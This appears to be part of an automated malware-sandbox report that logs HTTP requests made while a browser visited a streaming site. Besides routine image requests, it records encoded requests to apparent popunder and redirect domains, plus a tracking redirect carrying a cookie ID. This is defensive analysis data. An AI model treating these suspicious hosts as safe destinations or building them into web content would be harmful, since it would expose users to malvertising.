Source: global trafficHTTP traffic detected: GET /images/M/MV5BODA3YWQwODktZDJhOC00YTMwLTgyMzUtYzFhZWI4MGYyYjQ0XkEyXkFqcGdeQXVyNTA4NzExMDg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzBjNjhhZDAtMmNjZS00YzM1LWE5ZDctNWJkNWQwOWFhMTkzXkEyXkFqcGdeQXVyNDUxNjc5NjY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ZFlsYWdLZg8SWj4OFFIFVQs+OTI+ADVQVjILXQUTMTU+MT8jDEoVDgBkXVFeVmtbWUEUMAhcVkIqGAATESpRUEENNwoOWkIvUVBJV21CUlFKbUoUWlV/GBEGA2RdRxcQLQBcVlNqWFNRVm9bVlRTbQ HTTP/1.1Host: bineukdwithme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZGEyNDljMjQtZGI0Ni00ZWM0LWI5NjktMjNiMmI1YmZiOTIxXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNTgxOGZjYzMtMDkzOS00ZTA5LTg3MmUtM2IyMWRiMzQwYjMxXkEyXkFqcGdeQXVyNjMxODMyODU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iframe_api HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WDQzUDF3C1AjDAxsaQFVDWYKAgMWd1cYQRBVZgIDPXEKO2M2cRUxUywJB3ZDPVAOYRcrWQ5hB35fDidQLFdbdQNoV18xQitdUHUDaEdGMkUxQF81Qn0GAz9fNF1dNRRqBFUiVD0RAWBGMUBbdQNoWVwmWD1HFSYMaRoAZB9rAh1kFytAQG0BfkRBPgxoElY9U2UEFSRYPAkCYAhqBgRoFypMSm0AagwDDwBoBgd2WDZXDn0AflJAbQB+RlY2DDBARyBCfQdydQMeEQEWVytcUiJULEIdM159BnV2VStAX21ZLEBDIxRrdRZid30GdTZCMFVBNUUuGlA/FGpyXj9HMVEWYnc7VUAxUzRVXTNQdVFDOUI3UFZ9AHVAR2ABawAGaAJ+XkAkDGgSVj5DZQQVPFItVQ49XiJdXzxQfQZ1ZR9oEQFgGS9dXTReL0cWYgE2QBZiAWkEHWAUa3YWYgEvXV1mBX0HcXUDaEwFZBh9BgMxQShYVidUOl9aJBRqcgZjBnYHBXUDaBxYOEU1WBZicn0GAzxYM1EWYgE/UVA7XnERAWBSMEZcPVR9BnVhAG8aA34BdgQWYgErVVUxQzERARYEawMdYwd+QEk0DHUBFSVdN1cOdlg+CQN2UiwJBnZSLFcOYQ HTTP/1.1Host: getrunkhomuto.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzkyYjk2MGMtNjdlYS00M2Y5LThiNmMtNDQxYTk2MTUyNmMwXkEyXkFqcGdeQXVyOTg4MDk3MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDNlNDIyNGQtNWUwYy00MjZlLThmMmItZjEwMjEyM2E5OGQ5XkEyXkFqcGdeQXVyODk1MjAxNzQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODk0NjBmZTYtMTBmMi00MDkzLTg2ZjYtMDVkOWY1NjYxMWY0XkEyXkFqcGdeQXVyMTY5Nzc4MDY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGRlOWYyZjItMzMwZS00ZTA5LTliYWUtZWQxZTllOTQ1Y2VlL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDBkM2I3OTQtNmI3MC00ZjI1LTk3NzQtYzcwMWE2NTBjMGNiXkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODA3YWQwODktZDJhOC00YTMwLTgyMzUtYzFhZWI4MGYyYjQ0XkEyXkFqcGdeQXVyNTA4NzExMDg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjA5OTk3OTQzOF5BMl5BanBnXkFtZTcwNDcyODkyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTk3OWJmZWUtYmZmZi00YmI5LWE4ZWQtODE0YjI0Mzk4MDkxL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTQ3NjU1NjU1Ml5BMl5BanBnXkFtZTcwODIxNzYxMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZGEyNDljMjQtZGI0Ni00ZWM0LWI5NjktMjNiMmI1YmZiOTIxXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /U1VLT0N8aig8fgECPxsZFBN4Gi4ZMR18CTAMJwkSNzl+PhUFAG07Kjdoen96YG1yd2UjPC9ycmtzODsiJyA4cnJ1PCUpLG5zPXJyfWVlfW1mcz5ycnUhOy4kbmRtPzcnOXZ+dGBheXlxZWJ8fHpm HTTP/1.1Host: bineukdwithme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /popunder.gif HTTP/1.1Host: bineukdwithme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdeQXVyMjgyNjk3MzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTQ2Nzc1MDQzOF5BMl5BanBnXkFtZTgwMDgzMTA5MzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzkyYjk2MGMtNjdlYS00M2Y5LThiNmMtNDQxYTk2MTUyNmMwXkEyXkFqcGdeQXVyOTg4MDk3MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTc2MTY4NTM2NV5BMl5BanBnXkFtZTcwNzEyMzkxMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDM2ZGY5MDQtZTUyMS00ZTgzLTk4YWMtMWM2YjE2NWQ1Yjk3XkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGRlOWYyZjItMzMwZS00ZTA5LTliYWUtZWQxZTllOTQ1Y2VlL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMWY0NzY0NWMtZDg2NC00NjI3LThhNTAtOWY4Y2ZhY2FiMmY4XkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDBkM2I3OTQtNmI3MC00ZjI1LTk3NzQtYzcwMWE2NTBjMGNiXkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /iframe_api HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjNhNTgyNGQtM2RkMS00YzRmLWFjMWQtZDA2NDU2ODZkMzExXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTQ3NjU1NjU1Ml5BMl5BanBnXkFtZTcwODIxNzYxMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=US HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdeQXVyMjgyNjk3MzE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjEyMzYyZWEtYzM3Ny00YTgxLThmMTQtY2YzM2JkYWQ1YzNjXkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
